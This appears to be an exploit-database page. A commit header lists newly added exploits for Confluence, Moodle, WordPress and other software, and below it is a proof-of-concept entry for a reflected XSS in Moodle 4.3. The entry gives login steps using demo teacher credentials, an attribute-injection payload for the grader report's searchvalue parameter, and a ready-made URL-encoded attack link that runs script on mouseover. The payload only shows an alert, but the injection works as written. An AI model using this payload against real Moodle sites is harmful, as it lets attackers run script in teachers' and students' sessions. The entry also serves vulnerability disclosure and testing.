
13 changes to exploits/shellcodes/ghdb TEM Opera Plus FM Family Transmitter 35.45 - Remote Code Execution TEM Opera Plus FM Family Transmitter 35.45 - XSRF Executables Created with perl2exe < V30.10C - Arbitrary Code Execution Atlassian Confluence Data Center and Server - Authentication Bypass (Metasploit) Automatic-Systems SOC FL9600 FastLine - Directory Transversal Automatic-Systems SOC FL9600 FastLine - The device contains hardcoded login and password for super admin dawa-pharma 1.0-2022 - Multiple-SQLi Moodle 4.3 - Insecure Direct Object Reference Moodle 4.3 - Reflected XSS SuperStoreFinder - Multiple Vulnerabilities Wordpress Plugin Canto < 3.0.5 - Remote File Inclusion (RFI) and Remote Code Execution (RCE) Zoo Management System 1.0 - Unauthenticated RCE
19 lines
No EOL
837 B
Text
19 lines
No EOL
837 B
Text
# Exploit Title: Moodle 4.3 Reflected XSS
|
|
# Date: 21/10/2023
|
|
# Exploit Author: tmrswrr
|
|
# Vendor Homepage: https://moodle.org/
|
|
# Software Demo: https://school.moodledemo.net/
|
|
# Version: 4.3
|
|
# Tested on: Linux
|
|
|
|
|
|
Vulnerability Details
|
|
======================
|
|
|
|
Steps :
|
|
|
|
1. Log in to the application with the given credentials > USER: teacher PASS: moodle
|
|
2. Go to this page https://school.moodledemo.net/grade/report/grader/index.php?id=69&searchvalue=
|
|
3. Write this payload in the searchvalue field : "onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"qq9r3
|
|
4. When click this url "https://school.moodledemo.net/grade/report/grader/index.php?id=69&searchvalue=%22onmouseover=%22alert(document.domain)%22style=%22position:absolute;width:100%;height:100%;top:0;left:0;%22qq9r3"
|
|
5. You will be see alert button |